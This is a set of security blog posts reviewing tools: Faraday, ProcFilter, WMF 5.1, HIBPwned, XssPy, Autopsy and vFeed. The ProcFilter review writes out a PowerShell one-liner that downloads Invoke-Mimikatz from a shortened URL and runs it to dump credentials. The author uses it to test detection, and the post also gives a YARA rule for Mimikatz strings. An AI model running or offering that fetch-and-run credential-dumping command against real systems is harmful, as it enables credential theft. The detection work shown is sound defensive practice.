Friday, August 19, 2016

Toolsmith Release Advisory: Faraday v2.0 - Collaborative Penetration Test & Vulnerability Management Platform

Toolsmith first covered Faraday in March 2015 with Faraday IPE - When Tinfoil Won’t Work for Pentesting. Now that it has hit its 2.0 release milestone, I'm reprinting Francisco Amato's announcement regarding Faraday 2.0, as sent via securityfocus.com to the webappsec mailing list.

"Faraday is the Integrated Multiuser Risk Environment you were looking
for! It maps and leverages all the knowledge you generate in real
time, letting you track and understand your audits. Our dashboard for
CISOs and managers uncovers the impact and risk being assessed by the
audit in real-time without the need for a single email. Developed with
a specialized set of functionalities that help users improve their own
work, the main purpose is to re-use the available tools in the
community, taking advantage of them in a collaborative way! Check out
the Faraday project on GitHub.

Two years ago we published our first community version consisting
mainly of what we now know as the Faraday Client and a very basic Web
UI. Over the years we introduced some pretty radical changes, but
nothing like what you are about to see - we believe this is a turning
point for the platform, and we are more than happy to share it with
all of you. Without further ado we would like to introduce you to
Faraday 2.0!

https://github.com/infobyte/faraday/releases/tag/v2.0

This release, presented at Black Hat Arsenal 2016, spins around our
four main goals for this year:

* Faraday Server - a fundamental pillar for Faraday's future. Some of
the latest features in Faraday required a server that could step
between the client and CouchDB, so we implemented one! It still
supports a small number of operations, but it was built with
performance in mind. Which brings us to objective #2...

* Better performance - Faraday will now scale as you see fit. The new
server allows you to have huge workspaces without a performance slowdown.
200k hosts? No problem!

* Deprecate QT3 - the QT3 interface has been completely erased, while
the GTK one presented some versions ago will be the default interface
from now on. This means no more problems with QT3 non-standard
packages, smooth OSX support and a lighter Faraday Client for
everyone.

* Licenses - managing a lot of products is time consuming. As you may
already know we've launched Faraday's own App Store
https://appstore.faradaysec.com/ where you can get all of your
favourite tools (Burp suite, IDA Debugger, etc) whether they're open
source or commercial ones. But also, in order to keep your licenses up
to date and never miss an expiry date we've built a Licenses Manager
inside Faraday. Our platform now stores the licenses of third party
products so you can easily keep track of your licenses while
monitoring your pentest.

With this new release we can proudly say we already met all of this
year's objectives, so now we have more than four months to polish the
details. Some of the features released in this version are quite
basic, and we plan to extend them in the next few iterations.

Changes:

* Improved executive report generation performance.
* Totally removed QT3, GTK is now the only GUI.
* Added Faraday Server.
* Added some basic APIs to Faraday Server.
* Deprecated FileSystem databases: now Faraday works exclusively with
Faraday Server and CouchDB.
* Improved performance in web UI.
* Added licenses management section in web UI.
* Fixed bug when deleting objects from Faraday Web.
* Fixed bug when editing services in the web UI.
* Fixed bug where icons were not copied to the correct directory on
initialization.
* Added a button to go to the Faraday Web directly from GTK.
* Fixed bug where current workspace wouldn't correspond to selected
workspace on the sidebar on GTK.
* Fixed bug in 'Refresh Workspace' button on GTK.
* Fixed bug when searching for a non-existent workspace in GTK.
* Fixed bug where Host Sidebar and Status Bar information wasn't
correctly updated on GTK.
* Fixed sqlmap plugin.
* Fixed metasploit plugin.

We hope you enjoy it, and let us know if you have any questions or comments."

https://www.faradaysec.com
https://github.com/infobyte/faraday
https://twitter.com/faradaysec
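If you want to kick the tires, here's a minimal sketch of standing up 2.0 from source. The entry-point script names and the CouchDB prerequisite are my read of the release notes, not gospel; check the project wiki before relying on them.

git clone https://github.com/infobyte/faraday.git
cd faraday
# Start the new Faraday Server (assumes a CouchDB instance configured per the wiki)
python2 faraday-server.py
# Launch the GTK client from a second terminal
python2 faraday.py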

Ping me via email or Twitter if you have questions (russ at holisticinfosec dot org or @holisticinfosec).
Cheers…until next time. 

Tuesday, August 09, 2016

Toolsmith In-depth Analysis: ProcFilter - YARA-integrated Windows process denial framework

Note: Next month, toolsmith #120 will represent ten years of award-winning security tools coverage. It's been an amazing journey; I look to you, dear reader, for ideas on what tool you'd like to see me cover for the decade anniversary edition. Contact information is at the end of this post.

Toolsmith #119 focuses on ProcFilter, a new project, just a month old as this is written, found on GitHub by one of my blue team members (shout-out to Ina). It's brought to you by the GoDaddy Engineering crew, and I see a lot of upside and potential in this project. Per its GitHub readme, ProcFilter is "a process filtering system for Windows with built-in YARA integration. YARA rules can be instrumented with custom meta tags that tailor its response to rule matches. It runs as a Windows service and is integrated with Microsoft's ETW API, making results viewable in the Windows Event Log. Installation, activation, and removal can be done dynamically and do not require a reboot."
Malware analysts can use ProcFilter to create YARA signatures to protect Windows environments against specific threats. It's a lightweight, precise, targeted tool that does not include a large signature set. "ProcFilter is also intended for use in controlled analysis environments where custom plugins can perform artifact-specific actions."
GoDaddy's Emerson Wiley, the ProcFilter project lead, provided me with valuable insight on the tool and its future.
"For us at GoDaddy the idea was to get YARA signatures deployed proactively. YARA has a lot of traction within the malware analysis community and its flexible nature makes it perfect for malware categorization. What ProcFilter brings to the table is the ability to get those signatures out there in a preventative fashion with minimal overhead. What we're saying by making this project open source is, “This is interesting to us; if it’s interesting to you then lets work together and move it forward.”

Endpoint tools don’t typically provide openness, flexibility, and extensibility so those are other areas where ProcFilter stands out. I’m passionate about creating extensible software - if people have the opportunity to implement their own ideas it’s pretty much guaranteed that you’ll be blown away by what they create. With the core of the project trending towards stability we’re going to start focusing on building plugins that do unique and interesting things with process manipulation. We’re just starting to scratch the surface there and I look forward to what comes next.

Something I haven’t mentioned elsewhere is a desire to integrate support for Python or Lua plugins. This could provide security engineers a quick, easy way to react to process and thread events. There’s a testing branch with some of these features and we’ll see where it goes."


Installation
ProcFilter integrates nicely with Git and Windows Event Logging to minimize the need for additional tools or infrastructure for rules deployment or results acquisition.

ProcFilter is a beta offering with lots of commits from Emerson. I grabbed the x64 release installer (a debug build is also available) for the 1.0.0-beta.2 release. Installation was seamless and rapid. ProcFilter runs as a service by default; you'll see the ProcFilter Service via services.msc, as follows.

ProcFilter Service
You'll want to review, and likely modify, procfilter.ini as it lets you manage ProcFilter with flexible granularity.  You'll be able to manage plugins, rules files, blocking, logging, and quarantine, as well as scanning parameters and white-listing.

ProcFilter Use
You can also work with ProcFilter interactively via the command prompt, again with impressive flexibility. A quick procfilter -status will advise you of your running state.
ProcFilter Service
Given that ProcFilter installs with a lean rule set out of the gate, I opted to grab a few additional rules for my test scenario. There is one rule set built by Florian Roth (Neo23x0) that you may want to deploy situationally; it's quite broad, but offers extensive and effective coverage. As my test scenario was specific to PowerShell-borne attacks such as Invoke-Mimikatz, I zoomed in on a very specific rule set devised by the man himself, mimikatz creator Benjamin Delpy. Yes, he's written very effective rules to detect his own craftsmanship.
mimikatz power_pe_injection YARA rule
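For context, here is a minimal, purely illustrative YARA rule of the sort you could drop in alongside Delpy's; this sketch is mine, not his, and the string choices are simply common Invoke-Mimikatz indicators. Per the readme, ProcFilter can also read custom meta tags from rules to tailor its response; consult the readme for the exact tag names.

rule powershell_mimikatz_indicators
{
    meta:
        description = "Illustrative only: common Invoke-Mimikatz strings"
    strings:
        $s1 = "Invoke-Mimikatz" ascii wide
        $s2 = "sekurlsa::logonpasswords" ascii wide
        $s3 = "DumpCreds" ascii wide
    condition:
        any of them
}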
I opted to drop the rules in my master.yara file in the localrules directory, specifically here: C:\Program Files\ProcFilter\localrules\master.yara. I restarted the service and also ran procfilter -compile from the command line to ensure a clean rules build. Command-line options follow:
Command-line options


Attack
As noted in our May 2015 discussion of Rekall use for hunting in-memory adversaries, an attack such as IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds should present a good opportunity for testing. Given the endless number of red vs. blue PowerShell scenarios, this one lined up perfectly. Using a .NET webclient call, this expression grabs Invoke-Mimikatz.ps1 from @mattifestation's PowerSploit GitHub and runs it in memory.
Invoke-mimikatz

The attack didn't get very far at all on Windows 10, by design, but that doesn't mean we don't want to detect such attempted abuses in our environment, even if unsuccessful.

Detect
You can use command-line options to sweep broadly or target a specific process. In this case, I was able to reasonably assert (good job, Russ) that the PowerShell process might be the culprit. Sheer genius, I know. :-)

Suspect process

Running procfilter -memoryscan 10612 came through like a champ.
Command-line ProcFilter detection
The real upside of ProcFilter, though, is that it writes to the Windows Event Log; you just need to build a custom filter as described in the readme.
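As a sketch, a custom Event Viewer XML filter might look like the following; the provider name and log path here are assumptions on my part, so confirm both against the readme and your own Event Log.

<QueryList>
  <Query Id="0">
    <Select Path="Application">*[System[Provider[@Name='ProcFilter']]]</Select>
  </Query>
</QueryList>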
The result, as dictated in part by your procfilter.ini configuration, should look something like the following once you trigger an event that matches one of your YARA rules.
ProcFilter event log view
In closing

Great stuff from the GoDaddy Engineering team; I see significant promise in ProcFilter and really look forward to its continued support and development. Thanks to Emerson Wiley for all his great feedback.
Ping me via email or Twitter if you have questions: russ at holisticinfosec dot org or @holisticinfosec.
Cheers…until next time, for the big decade anniversary edition.

Wednesday, July 27, 2016

Toolsmith Release Advisory: Windows Management Framework (WMF) 5.1 Preview

Windows Management Framework (WMF) 5.1 Preview has been released to the Download Center.
"WMF provides users with the ability to update previous releases of Windows Server and Windows Client to the management platform elements released in the most current version of Windows. This enables a consistent management platform to be used across the organization, and eases adoption of the latest Windows release."
As posted to the Window PowerShell Blog and reprinted here:
WMF 5.1 Preview includes the PowerShell, WMI, WinRM, and Software Inventory and Licensing (SIL) components that are being released with Windows Server 2016. 
WMF 5.1 can be installed on Windows 7, Windows 8.1, Windows Server 2008 R2, 2012, and 2012 R2, and provides a number of improvements over WMF 5.0 RTM including:
  • New cmdlets: local users and groups; Get-ComputerInfo
  • PowerShellGet improvements include enforcing signed modules, and installing JEA modules
  • PackageManagement added support for Containers, CBS Setup, EXE-based setup, CAB packages
  • Debugging improvements for DSC and PowerShell classes
  • Security enhancements including enforcement of catalog-signed modules coming from the Pull Server and when using PowerShellGet cmdlets
  • Responses to a number of user requests and issues
Detailed information on all the new WMF 5.1 features and updates, along with installation instructions, is in the WMF 5.1 release notes.
Please note:
  • WMF 5.1 Preview requires the .NET Framework 4.6, which must be installed separately. Instructions are available in the WMF 5.1 Release Notes Install and Configure topic.
  • WMF 5.1 Preview is intended to provide early information about what is in the release, and to give you the opportunity to provide feedback to the PowerShell team, but is not supported for production deployments at this time.
  • WMF 5.1 Preview may be installed directly over WMF 5.0.
  • It is a known issue that WMF 4.0 is currently required in order to install WMF 5.1 Preview on Windows 7 and Windows Server 2008. This requirement is expected to be removed before the final release.
  • Installing future versions of WMF 5.1, including the RTM version, will require uninstalling the WMF 5.1 Preview.
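Once you've installed the preview, a quick sanity check from PowerShell confirms the engine version and exercises Get-ComputerInfo, one of the new cmdlets called out above (the properties selected here are a small illustrative subset):

# Confirm the PowerShell engine version the WMF 5.1 Preview installed
$PSVersionTable.PSVersion

# Exercise one of the new WMF 5.1 cmdlets
Get-ComputerInfo | Select-Object WindowsProductName, OsVersion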


Sunday, July 10, 2016

Toolsmith Release Advisory: Steph Locke's HIBPwned R package

I'm a bit slow on this one, but better late than never. Steph dropped her HIBPwned R package on CRAN at the beginning of June, and it's well worth your attention. HIBPwned is an R package that wraps Troy Hunt's HaveIBeenPwned.com API, useful for checking whether you have an account that has been compromised in a data breach. As one who has been "pwned" no fewer than three times via three different accounts, thanks to LinkedIn, Patreon, and Adobe, I love Troy's site and have visited it many times.

When I spotted Steph's wrapper on R-Bloggers, I was quite happy.
Steph built HIBPwned to allow users to:
  • Set up your own notification system for account breaches of myriad email addresses & user names that you have
  • Check for compromised company email accounts from within your company Active Directory
  • Analyse past data breaches and produce reports and visualizations
I installed it from Visual Studio with R Tools via install.packages("HIBPwned", repos="http://cran.rstudio.com/", dependencies=TRUE).
You can also use devtools to install directly from the Censornet GitHub:
if(!require("devtools")) install.packages("devtools")
# Get or upgrade from github
devtools::install_github("censornet/HIBPwned")
Source is available on the Censornet GitHub, as is recommended usage guidance.
As you run any of the HIBPwned functions, be sure to have called the library first: library("HIBPwned").

As mentioned, I've seen my share of pwnage, luckily with no real impact, but it's annoying nonetheless and well worth constant monitoring.
I first combined my accounts into a vector and confirmed what I've already mentioned, popped thrice:
account_breaches(c("rmcree@yahoo.com","holisticinfosec@gmail.com","russ@holisticinfosec.org"), truncate = TRUE)
$`rmcree@yahoo.com`
   Name
1 Adobe

$`holisticinfosec@gmail.com`
      Name
1 LinkedIn

$`russ@holisticinfosec.org`
     Name
1 Patreon

You may want to pull specific details about each breach to learn more. Continuing with my scenario, that's easily done using breached_site() for the company name or breached_sites() for its domain.
Breached
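The calls look like this (a quick sketch based on the function descriptions above):

library("HIBPwned")
breached_site("LinkedIn")       # details for a named breach
breached_sites("linkedin.com")  # all breaches recorded against a domain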
You may also be interested to see whether any of your PII has landed on a paste site (Pastebin, etc.). The pastes() function is the most recent one Steph has added to HIBPwned.
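For instance, a single call per address (sketch):

pastes("russ@holisticinfosec.org")  # returns any pastes referencing the address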

Pasted
Uh oh, I'm on the list here too; I'm not quite sure how I ended up in this dump of "Egypt gov stuff". According to PK1K3, who "got pissed of at the Egypt gov", his is a "list of account the egypt govs is spying on if you find your email/number here u are rahter with them or slaves to them." Neither is true, but fascinating regardless.

Need some simple markdown to run every so often to keep an eye on your accounts? Try HIBPwned.Rmd. Download the file, open it in RStudio, swap out my email addresses for yours, then select Knit HTML. You can also produce Word or PDF output if you'd prefer.

Report
Great stuff from Steph, and of course Troy. Use this wrapper to your advantage, and keep an eye out for other related work on itsalocke.com.

Wednesday, June 22, 2016

Toolsmith Tidbit: XssPy

You've likely seen chatter recently regarding the pilot Hack the Pentagon bounty program that just wrapped up, as facilitated by HackerOne. It should come as no surprise that the most common vulnerability reported was cross-site scripting (XSS). I was invited to participate in the pilot and, yes, I found and submitted an XSS bug, but sadly it was a duplicate of one already reported. Regardless, it was a great initiative by DoD, SecDef, and the Defense Digital Service, and I'm proud to have been asked to participate. I've spent my share of time finding XSS bugs and had some success, so I'm always happy when a new tool comes along to discover and help eliminate these bugs when responsibly reported.
XssPy is just such a tool.
A description, as paraphrased from its GitHub page:
XssPy is a Python tool for finding Cross Site Scripting vulnerabilities. XssPy traverses websites to find all the links and subdomains first, then scans each and every input on each and every page discovered during traversal.
XssPy uses small yet effective payloads to search for XSS vulnerabilities.
The tool has been tested in parallel with commercial vulnerability scanners, most of which failed to detect vulnerabilities that XssPy was able to find. While most paid tools typically scan only one site, XssPy first discovers sub-domains, then scans all links.
XssPy includes:
1) Short Scanning
2) Comprehensive Scanning
3) Subdomain discovery
4) Comprehensive input checking
XssPy has discovered cross-site scripting vulnerabilities in the websites of MIT, Stanford, Duke University, Informatica, FormAssembly, ActiveCampaign, Volcanicpixels, Oxford, Motorola, Berkeley, and many more.

Install as follows:
git clone https://github.com/faizann24/XssPy/ /opt/xsspy
Python 2.7 is required and you should have mechanize installed. If mechanize is not installed, type pip install mechanize in the terminal.

Run as follows:
python XssPy.py website.com (no http:// or www).
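End to end, that's all there is to it (a sketch assuming Python 2.7 and pip are on your path):

git clone https://github.com/faizann24/XssPy/ /opt/xsspy
cd /opt/xsspy
pip install mechanize
python XssPy.py website.com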

Let me know what successes you have via email or Twitter and let me know if you have questions (russ at holisticinfosec dot org or @holisticinfosec).
Cheers…until next time.

Wednesday, June 08, 2016

Toolsmith Feature Highlight: Autopsy 4.0.0's case collaboration

First, here be changes.
After nearly ten years of writing toolsmith exactly the same way once a month, now for the 117th time, it's time to mix things up a bit.
1) Tools follow release cycles, and often may add a new feature that could be really interesting, even if the tool has been covered in toolsmith before.
2) Sometimes there may not be a lot to say about a tool if its usage and feature set are simple and easy, yet useful to us.
3) I no longer have an editor or publisher that I'm beholden to, so there's no reason to land toolsmith content only once a month at the same time.
Call it agile toolsmith. If there's a good reason for a short post, such as a new release or feature, I'll publish immediately, and every so often, when warranted, I'll do a full-coverage analysis of a really strong offering.
For tracking purposes, I'll use title tags (I'll use these on Twitter as well):
  • Toolsmith Feature Highlight
    • new feature reviews
  • Toolsmith Release Advisory
    • heads up on new releases
  • Toolsmith Tidbit
    • infosec tooling news flashes
  • Toolsmith In-depth Analysis
    • the full monty
That way you get the tl;dr so you know what you're in for.

On to our topic.
This is definitely in the "in case you missed it" category; I was clearly asleep at the wheel, as Autopsy 4.0.0 was released in Nov 2015. The major highlight of this release is the ability to set up a multi-user environment, including "multi-user cases supported that allow collaboration using network-based services." Just in case you aren't current on free and open-source DFIR tools, "Autopsy® is a digital forensics platform and graphical interface to The Sleuth Kit® and other digital forensics tools." Thanks to my crew: Luiz Mello for pointing the v4 release out to me, and Mike Fanning for a perfect small pwned system to test v4 with.

Autopsy 4.0.0 case creation walk-through

I tested the latest Autopsy with an .e01 image I'd created from a 2TB victim drive, as well as against a mounted VHD.

Select the new case option via the opening welcome splash (green plus), the menu bar via File | New Case, or Ctrl+N:
New case
Populate your case number and examiner:
Case number and examiner
Point Autopsy at a data source. In this case I refer to my .e01 file, but I also mounted a VHD as a local drive during testing (an option under the select source type drop-down).
Add data source
Determine which ingest modules you'd like to use. As I examined both a large ext4 filesystem as well as a Windows Server VHD, I turned off Android Analyzer...duh. :-)
Ingest modules
After the image or drive goes through initial processing you'll land on the Autopsy menu. The Quick Start Guide will get you off to the races.

The real point of our discussion here is the new Autopsy 4.0.0 case collaboration feature, as pulled directly from Autopsy User Documentation: Setting Up Multi-user Environment

Multi-user Installation

Autopsy can be set up to work in an environment where multiple users on different computers can have the same case open at the same time. To set up this type of environment, you will need to configure additional (free and open source) network-based services.

Network-based Services

You will need the following that all Autopsy clients can access:

  • Centralized storage that all clients running Autopsy have access to. The central storage should either be mounted at the same Windows drive letter on every client or be accessed via the same UNC path everywhere. All clients need to be able to access data using the same path.
  • A central PostgreSQL database. A database will be created for each case and will be stored on the local drive of the database server. Installation and configuration is explained in Install and Configure PostgreSQL.
  • A central Solr text index. A Solr core will be created for each case and will be stored in the case folder (not on the local drive of the Solr server). We recommend using Bitnami Solr. This is explained in Install and Configure Solr.
  • An ActiveMQ messaging server to allow the various clients to communicate with each other. This service has minimal storage requirements. This is explained in Install and Configure ActiveMQ.

When you set up the above services, securely document the addresses, user names, and passwords so that you can configure each of the client systems afterwards.

The Autopsy team recommends using at least two dedicated computers for this additional infrastructure. Spreading the services out across several machines can improve throughput. If possible, place Solr on a machine by itself, as it utilizes the most RAM and CPU among the servers.

Ensure that the central storage and PostgreSQL servers are regularly backed up.

Autopsy Clients

Once the infrastructure is in place, you will need to configure Autopsy to use them.

Install Autopsy on each client system as normal using the steps from Installing Autopsy.
Start Autopsy and open the multi-user settings panel from "Tools", "Options", "Multi-user". As shown in the screenshot below, you can then enter all of the address and authentication information for the network-based services. Note that in order to create or open Multi-user cases, "Enable Multi-user cases" must be checked and the settings below must be correct.

Multi-user settings
In closing

Autopsy use is very straightforward and well documented. As of version 4.0.0, the ability to utilize a multi-user environment is a highly beneficial feature for larger DFIR teams. Forensicators and responders alike should be able to put it to good use.
Ping me via email or Twitter if you have questions (russ at holisticinfosec dot org or @holisticinfosec).
Cheers…until next time.

Sunday, May 08, 2016

toolsmith #116: vFeed & vFeed Viewer

Overview

In case you haven't guessed by now, I am an unadulterated tools nerd. Hopefully, ten years of toolsmith have helped you come to that conclusion on your own. I rejoice when I find like-minded souls, and I found one in Nabil (NJ) Ouchn (@toolswatch), he of Black Hat Arsenal and toolswatch.org fame. In addition to those valued and well-executed community services, NJ also spends a good deal of time developing and maintaining vFeed. vFeed includes a Python API and the vFeed SQLite database, now with support for MongoDB. It is, for all intents and purposes, a correlated community vulnerability and threat database. I've been using vFeed for quite a while now, having learned about it when writing about FruityWifi a couple of years ago.
NJ fed me some great updates on this constantly maturing product.
Having achieved compatibility certifications (CVE, CWE, and OVAL) from MITRE, the vFeed Framework (API and Database) has earned more than a little gratitude from the information security community: users, CERTs, and penetration testers alike. NJ draws strength from this to add more features now and in the future. The vFeed roadmap is huge, ranging from adding new sources such as security advisories from industrial control system (ICS) vendors, to supporting other standards such as STIX, to importing and enriching scan results from third-party vulnerability and threat scanners such as Nessus, Qualys, and OpenVAS.
A number of articles have highlighted impressive vFeed use cases.
Needless to say, some fellow security hackers and developers have included vFeed in their toolkit, including Faraday (March 2015 toolsmith), Kali Linux, and more (FruityWifi as mentioned above).

The upcoming version of vFeed will introduce support for CPE 2.3, CVSS 3, and new reference sources. A proof of concept for accessing the vFeed database via a RESTful API is in testing as well; NJ is fine-tuning his Flask skills before releasing it. :) NJ does not consider himself a skilled Python programmer (humble, but unwarranted). Luckily, Python is the ideal programming language for someone like him to express his creativity.
I'll show you all about woeful programming here in a bit when we discuss the vFeed Viewer I've written in R.

First, a bit more about vFeed, from its Github page:
The vFeed Framework is CVE, CWE and OVAL compatible and provides structured, detailed third-party references and technical details for CVE entries via an extensible XML/JSON schema. It also improves the reliability of CVEs by providing a flexible and comprehensive vocabulary for describing the relationship with other standards and security references.
vFeed utilizes XML-based and JSON-based formatted output to describe vulnerabilities in detail. This output can be leveraged as input by security researchers, practitioners, and tools as part of their vulnerability analysis practice, in a standard syntax easily interpreted by both human and machine.
The associated vFeed.db (the Correlated Vulnerability and Threat Database) is a detective and preventive security information repository, useful for gathering vulnerability and mitigation data from scattered internet sources into a unified database.
vFeed's documentation is now well populated in its Github wiki, and should be read in its entirety:
  1. vFeed Framework (API & Correlated Vulnerability Database)
  2. Usage (API and Command Line)
  3. Methods list
  4. vFeed Database Update Calendar
vFeed features include:
  • Easy integration within security labs and other pentesting frameworks 
  • Easily invoked via API calls from your software, scripts or from command-line. A proof of concept python api_calls.py is provided for this purpose
  • Simplify the extraction of related CVE attributes
  • Enable researchers to conduct vulnerability surveys (tracking vulnerability trends regarding a specific CPE)
  • Help penetration testers analyze CVEs and gather extra metadata to help shape attack vectors to exploit vulnerabilities
  • Assist security auditors in reporting accurate information about findings during assignments. vFeed is useful in describing a vulnerability with attributes based on standards and third-party references (vendors or companies involved in the standardization effort)
vFeed installation and usage

Installing vFeed is easy: just download the ZIP archive from GitHub and unpack it in your preferred directory or, assuming you've got Git installed, run git clone https://github.com/toolswatch/vFeed.git
You'll need a Python interpreter installed; the latest instance of 2.7 is preferred. From the directory in which you installed vFeed, just run python vfeedcli.py -h followed by python vfeedcli.py -u to confirm all is updated and in good working order; you're ready to roll.
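Consolidated, that first run looks like this:

git clone https://github.com/toolswatch/vFeed.git
cd vFeed
python vfeedcli.py -h    # confirm the CLI runs
python vfeedcli.py -u    # pull down the latest vfeed.db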

You've now read section 2 (Usage) on the wiki, so you don't need a total usage rehash here. We'll instead walk through a few options with one of my favorite CVEs: CVE-2008-0793.

If we invoke python vfeedcli.py -m get_cve CVE-2008-0793, we immediately learn that it refers to a Tendenci CMS cross-site scripting vulnerability. The -m parameter lets you define the preferred method, in this case, get_cve.


Groovy. Is there an associated CWE for CVE-2008-0793? But of course. Using the get_cwe method, we learn that CWE-79, "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", is our match.
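From the CLI, that lookup is just another method call:

python vfeedcli.py -m get_cwe CVE-2008-0793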


If you want to quickly learn all the available methods, just run python vfeedcli.py --list.
Perhaps you'd like to determine what the CVSS score is, or what references are available, via the vFeed API? Easy, if you run...

from lib.core.methods.risk import CveRisk  # vFeed API: risk-related methods
cve = "CVE-2014-0160"
cvss = CveRisk(cve).get_cvss()  # retrieve CVSS scoring data for the CVE
print cvss

You'll retrieve...


For reference material...

from lib.core.methods.ref import CveRef  # vFeed API: reference methods
cve = "CVE-2008-0793"
ref = CveRef(cve).get_refs()  # retrieve third-party references for the CVE
print ref

Yields...

And now you know...the rest of the story. CVE-2008-0793 is one of my favorites because a) I discovered it, and b) the vendor was one of the best of many hundreds I've worked with to fix vulnerabilities.

vFeed Viewer

If NJ thinks his Python skills are rough, wait until he sees this. :-)
I thought I'd get started on a user interface for vFeed using R and Shiny, appropriately named vFeed Viewer and found on GitHub. This first version does not allow direct queries of the vFeed database, as I'm still working on SQL injection prevention, but it does allow very granular filtering of key vFeed tables. Once I work out safe queries and sanitization, I'll build in the same full correlation features you enjoy from NJ's Python vFeed client.
You'll need a bit of familiarity with R to make use of this viewer.
First, install R and RStudio. From the RStudio console, to ensure all dependencies are met, run install.packages(c("shinydashboard","RSQLite","ggplot2","reshape2")).
Download and install the vFeed Viewer in the root vFeed directory such that app.R and the www directory sit side by side with vfeedcli.py, etc. This ensures that the viewer can read vfeed.db, which it opens directly with dbConnect and dbReadTable from the RSQLite package.
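If you'd like to poke at vfeed.db directly from the R console, a minimal sketch follows; the table name is illustrative only, so use dbListTables() to see what the database actually contains.

library(RSQLite)
con <- dbConnect(SQLite(), "vfeed.db")  # assumes the working directory is the vFeed root
dbListTables(con)                       # enumerate the available tables
nvd <- dbReadTable(con, "nvd_db")       # illustrative table name
dbDisconnect(con)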
Open app.R with RStudio, then click the Run App button. Alternatively, from the command line, assuming R is in your path, you can run R -e "shiny::runApp('~/shinyapp')" where ~/shinyapp is the path to where app.R resides. In my case, on Windows, I ran R -e "shiny::runApp('c:\\tools\\vfeed\\app.R')". Then browse to the localhost address Shiny is listening on. You'll probably find the RStudio process easier and faster.
One important note about R: it's not known for performance, and this app takes about thirty seconds to load. If you use Microsoft (Revolution) R with the MKL library, you can take advantage of multiple cores, but be patient; it all runs in memory. It's fast as heck once it's loaded, though.
The UI is simple, including an overview.


At present, I've incorporated NVD and CWE search mechanisms that allow very granular filtering.


As an example, using our favorite CVE-2008-0793, we can zoom in via the search field or the CVE ID drop-down menu. Results are returned instantly from 76,123 total NVD entries at present.


From the CWE search you can opt to filter by keywords, such as XSS for this scenario, to find related entries. If you drop cross-site scripting in the search field, you can then filter further via the cwetitle filter field at the bottom of the UI. This is universal to this use of Shiny, and allows really granular results.


You can also get an idea of the number of vFeed entries per vulnerability category. I dropped CPEs, as their count throws the chart off terribly and results in a bad visualization.


I'll keep working on the vFeed Viewer so it becomes more useful and helps serve the vFeed community. It's definitely a work in progress but I feel as if there's some potential here.

Conclusion

Thanks to NJ for vFeed and all his work with the infosec tools community; if you're going to Black Hat, be certain to stop by Arsenal. Make use of vFeed as part of your vulnerability management practice, and remember to check for updates regularly. It's a great tool, and getting better all the time.
Ping me via email or Twitter if you have questions (russ at holisticinfosec dot org or @holisticinfosec).
Cheers…until next month.

Acknowledgements

Nabil (NJ) Ouchn (@toolswatch)